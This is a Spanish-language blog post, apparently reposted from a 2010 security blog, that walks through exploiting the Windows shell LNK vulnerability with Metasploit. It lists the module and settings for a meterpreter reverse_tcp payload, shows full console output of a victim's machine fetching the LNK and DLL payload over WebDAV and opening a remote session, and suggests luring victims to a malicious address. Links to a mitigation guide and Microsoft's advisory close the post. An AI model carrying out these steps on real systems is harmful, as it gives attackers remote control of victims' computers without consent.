Explotando "LNK" con Metasploit - Método 2

[*] - Explotando "LNK" con MetaSploit - Método 1
[*] - Explotando "LNK" con MetaSploit - Método 2

Ahora vamos a citar otro método para explotar la vulnerabilidad "LNK" de Microsoft Windows XP.

Tendremos que actualizar Metasploit y lo que haremos será:
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute

Especificamos el exploit:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.78.133
SRVHOST => 192.168.78.133




Ahora indicamos el Host
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVPORT 80
SRVPORT => 80


Indicamos el puerto al que se tendrá que conectar la víctima
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp


Elegimos el PAYLOAD
set LHOST 192.168.162.136

Elegimos el Host
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LPORT 443
LPORT => 443


Ahora escogemos el puerto desde metasploit nos dará la shell con meterpreter y ejecutamos el exploit
exploit

Nos ha de salir algo como esto:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.78.133:443
[*]
[*] Send vulnerable clients to \\192.168.78.133\HGkqi\.
[*] Or, get clients to save and render the icon of http:///.lnk
[*]
[*] Using URL: http://192.168.78.133:80/
[*] Server started.


Ahora el cliente tendría navegar por una dirección "maligna". Al conseguir que pase por una dirección maligna podemos engañalo para que visite nuestra web (con NOIP por ejemplo)

Cuando el cliente se conecte a nuestro servidor vulnerable, veremos como funciona el exploit:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Sending UNC redirect to 192.168.78.139:49278 …
[*] Responding to WebDAV OPTIONS request from 192.168.78.139:49285
[*] Responding to WebDAV OPTIONS request from 192.168.78.139:49285
[*] Responding to WebDAV OPTIONS request from 192.168.78.139:49291
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/desktop.ini
[*] Sending 404 for /HGkqi/desktop.ini …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Sending LNK file to 192.168.78.139:49291 …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.manifest …
[*] Sending DLL payload 192.168.78.139:49291 …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.123.Manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.123.Manifest …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.124.Manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.124.Manifest …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/VuztjejOY.dll.2.Manifest
[*] Sending 404 for /HGkqi/VuztjejOY.dll.2.Manifest …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi
[*] Sending 301 for /HGkqi …
[*] Received WebDAV PROPFIND request from 192.168.78.139:49291 /HGkqi/
[*] Sending directory multistatus for /HGkqi/ …
[*] Sending stage (748032 bytes) to 192.168.78.139
[*] Meterpreter session 1 opened (192.168.78.133:443 -> 192.168.78.139:49292) at 2010-07-27 07:04:27 +0200


Como se puede ver, ya tendríamos una sesión abierta de Meterpreter

Abrimos la sesión:
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1

Y.. voilá!! Ya tenemos acceso al equipo:
meterpreter > getuid
Server username: W7\Seifreed


Y podemos ver los procesos:
meterpreter > ps
Process list
============
PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System
344 smss.exe
524 csrss.exe
576 wininit.exe
588 csrss.exe
640 winlogon.exe
664 services.exe
684 lsass.exe
692 lsm.exe
832 svchost.exe
920 svchost.exe
972 svchost.exe
1064 svchost.exe
1112 svchost.exe
1312 svchost.exe
1424 svchost.exe
1620 dwm.exe x86 1 W7\Seifreed C:\Windows\system32\Dwm.exe
1628 spoolsv.exe
1648 explorer.exe x86 1 W7\Seifreed C:\Windows\Explorer.EXE
1716 taskhost.exe x86 1 W7\Seifreed C:\Windows\system32\taskhost.exe
1732 svchost.exe
1988 VMwareTray.exe x86 1 W7\Seifreed C:\Program Files\VMware\VMware Tools\VMwareTray.exe
1996 VMwareUser.exe x86 1 W7\Seifreed C:\Program Files\VMware\VMware Tools\VMwareUser.exe
492 ProtectedObjectsSrv.exe
780 svchost.exe
1516 vmtoolsd.exe
1136 VMUpgradeHelper.exe
2436 TPAutoConnSvc.exe
2572 SearchIndexer.exe
2732 TPAutoConnect.exe x86 1 W7\Seifreed C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2840 svchost.exe
3264 conhost.exe x86 1 W7\Seifreed C:\Windows\system32\conhost.exe
3600 svchost.exe
1584 svchost.exe
3696 wmpnetwk.exe
1372 audiodg.exe x86 0
452 iexplore.exe x86 1 W7\Seifreed C:\Program Files\Internet Explorer\iexplore.exe
3012 iexplore.exe x86 1 W7\Seifreed C:\Program Files\Internet Explorer\iexplore.exe
3088 klwtblfs.exe x86 1 W7\Seifreed C:\Program Files\Kaspersky Lab\Kaspersky PURE\klwtblfs.exe
3204 rundll32.exe x86 1 W7\Seifreed C:\Windows\system32\rundll32.exe


Aún no existe un parche oficial de Microsoft, pero para mitigar el problema podemos utilizar la mini guia de nuestros compañeros de Security By default:
http://www.securitybydefault.com/2010/07/solucion-la-vulnerabilidad-lnk-de.html

El advisory de Microsoft lo podemos ver aquí:
https://www.microsoft.com/technet/security/advisory/2286198.mspx

Información extraída de:
http://seifreed.wordpress.com/2010/07/27/explotando-vulnerabilidad-lnk-con-metasploit

Entradas populares de este blog

Trinity Rescue Kit: Tutorial para eliminar la contraseña de administrador en Windows

Cómo extraer el handshake WPA/WPA2 de archivos de captura grandes

HTTP Fingerprinting